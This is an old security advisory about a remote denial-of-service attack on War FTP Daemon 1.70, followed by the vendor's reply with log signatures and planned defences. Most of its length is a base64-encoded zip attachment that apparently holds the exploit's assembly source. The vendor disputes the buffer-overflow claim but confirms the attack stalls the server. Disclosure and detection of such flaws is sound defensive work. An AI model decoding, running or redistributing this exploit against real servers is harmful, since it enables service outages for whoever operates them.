COMMAND
War FTPd
SYSTEMS AFFECTED
War FTP Daemon 1.70
PROBLEM
UssrLabs found a Local/Remote DoS Attack in War FTP Daemon 1.70
the buffer overflow is caused by a Multiples connections at the
same time (over 60) in the ftp server , and some characters in
the login name. There is not much to expand on.... just a simple
hole. For the source / binary of this remote / local D.O.S go to:
http://www.ussrback.com/
The exploit was tested against various computers just for try it,
and you can't use the exploit in the local machine, allways the
exploit works if we use it in remote mode. Below is mimed source
of exploit:
---
Content-Type: application/octet-stream; name="diewa170.zip"
Content-Transfer-Encoding: base64
Content-Disposition: inline; filename="diewa170.zip"
Content-MD5: 2RnYJ2bwWa44SrfL1W314w==
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
-----
SOLUTION
War FTP Daemon 1.70 is beta software, and will be replaced with a
new major version early next year. The development on the 1.70
source tree has stopped, and no new versions of 1.7* is planned,
- unless some erious security problems are reported. The Remote
D.o.S Attack does stall the server. There is however no
indication of any buffer-overflow problems or other
security-related problems. The attack is logged to the server-log
if the default log options are enabled. An attack of this type
may look like this in the server log:
I 12/17/99 02:19:43 FTPD:test21:0001 (User=18446744073709551615 ) [WarFTPD::OnAccept()] Client (193.91.161.151:4496->193.91.161.20:21) is connected to the FTP server.
I 12/17/99 02:19:43 FTPD:test21:0002 (User=18446744073709551615 ) [WarFTPD::OnAccept()] Client (193.91.161.151:4497->193.91.161.20:21) is connected to the FTP server.
I 12/17/99 02:19:43 FTPD:test21:0003 (User=18446744073709551615 ) [WarFTPD::OnAccept()] Client (193.91.161.151:4498->193.91.161.20:21) is connected to the FTP server.
...
A large number of connections from a single IP address at the
same time indicate an attack. If logging of debug messages are
enabled, the log will also show something like this:
D 12/17/99 02:19:48 FTPD:test21:000e (User=18446744073709551615 ) [WarFTPDControlSck::OnCommand()] Got command ".=1Fbl=17sJw=17{aP=10.q"
D 12/17/99 02:19:48 FTPD:test21:000e (User=18446744073709551615 ) [WarFTPDControlSck::OnCommand()] Got command "}=19DGqD=1F=06YH"
D 12/17/99 02:19:48 FTPD:test21:000e (User=18446744073709551615 ) [WarFTPDControlSck::OnCommand()] Got command "05(=17N^ m=11P=D3=92=B9=16=E0=CC=E1=01=F82Qc|"
War FTP Daemon 3.0 will have three levels of protection for this
and similar attacks:
- 1) Dynamic interaction with firewall software to lock out
flooders
- 2) Fast accept(); close(); cycles when connections are made
too fast
- 3) Traffic analysis and temporary lock-outs for hosts that
make too many connection attempts (hammering protection).